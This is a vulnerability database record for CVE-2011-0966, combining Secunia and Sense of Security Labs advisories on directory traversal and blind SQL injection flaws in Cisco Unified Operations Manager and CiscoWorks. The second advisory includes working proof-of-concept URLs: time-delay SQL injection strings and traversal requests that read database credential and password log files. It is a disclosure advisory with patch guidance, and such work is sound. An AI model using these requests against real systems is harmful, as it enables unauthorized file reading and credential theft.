ID

VAR-201105-0050

CVE

CVE-2011-0966

TITLE

Cisco CiscoWorks Common Services Vulnerable to directory traversal

DESCRIPTION

Directory traversal vulnerability in cwhp/auditLog.do in the Homepage Auditing component in Cisco CiscoWorks Common Services 3.3 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, aka Bug ID CSCto35577. CiscoWorks Common Services is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer. This issue is being monitored by Cisco Bug ID CSCto35577. CiscoWorks Common Services 3.3 and prior are vulnerable. ---------------------------------------------------------------------- http://twitter.com/secunia http://www.facebook.com/Secunia ---------------------------------------------------------------------- TITLE: CiscoWorks Common Services "file" Directory Traversal Vulnerability SECUNIA ADVISORY ID: SA44646 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44646/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44646 RELEASE DATE: 2011-05-20 DISCUSS ADVISORY: http://secunia.com/advisories/44646/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44646/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44646 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in CiscoWorks Common Services, which can be exploited by malicious people to disclose sensitive information. Input passed via the "file" parameter to cwhp/auditLog.do in the Homepage Auditing component is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences. SOLUTION: Restrict access to trusted hosts only. PROVIDED AND/OR DISCOVERED BY: Sense of Security Labs ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=23089 Sense of Security Labs: http://www.senseofsecurity.com.au/advisories/SOS-11-006 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Sense of Security - Security Advisory - SOS-11-006 Release Date. 18-May-2011 Last Update. - Vendor Notification Date. 28-Feb-2011 Product. Platform. Microsoft Windows Affected versions. CuOM 8.0 and 8.5 (verified), possibly others. Severity Rating. Medium - Low Impact. Database access, cookie and credential theft, impersonation, loss of confidentiality, local file disclosure, information disclosure. Attack Vector. Remote with authentication Solution Status. Vendor patch (upgrade to CuOM 8.6 as advised by Cisco) CVE reference. CVE-2011-0959 (CSCtn61716) CVE-2011-0960 (CSCtn61716) CVE-2011-0961 (CSCto12704) CVE-2011-0962 (CSCto12712) CVE-2011-0966 (CSCto35577) Details. Cisco Unified Operations Manager (CuOM) is a NMS for voice developed by Cisco Systems. Operations Manager monitors and evaluates the current status of both the IP communications infrastructure and the underlying transport infrastructure in your network. Multiple vulnerabilities have been identified in Cisco Unified Operations Manager and associated products. These vulnerabilities include multiple blind SQL injections, multiple XSS. and a directory traversal vulnerability. 1. Blind SQL injection vulnerabilities that affect CuOM CVE-2011-0960 (CSCtn61716): The Variable CCMs of PRTestCreation can trigger a blind SQL injection vulnerability by supplying a single quote, followed by a time delay call: /iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20 delay'0:0:20'--&Extns=&IPs= Additionally, variable ccm of TelePresenceReportAction can trigger a blind SQL injection vulnerability by supplying a single quote: /iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'-- 2. Directory traversal vulnerability that affects CiscoWorks Homepage CVE-2011-0966 (CSCto35577): http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini cmfDBA user database info: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.prope rties DB connection info for all databases: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.proper ties Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example. DB password change log: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\log\dbpwdChange.log Solution. Upgrade to CuOM 8.6. Refer to Cisco Bug IDs: CSCtn61716, CSCto12704, CSCto12712 and CSCto35577 for information on patches and availability of fixes. Discovered by. Sense of Security Labs. About us. Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the countries largest organisations. Sense of Security Pty Ltd Level 8, 66 King St Sydney NSW 2000 AUSTRALIA T: +61 (0)2 9290 4444 F: +61 (0)2 9290 4455 W: http://www.senseofsecurity.com.au E: info@senseofsecurity.com.au Twitter: @ITsecurityAU The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

path traversal

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Sense of Security Labs

SOURCES

LAST UPDATE DATE

2024-11-23T22:02:52.470000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE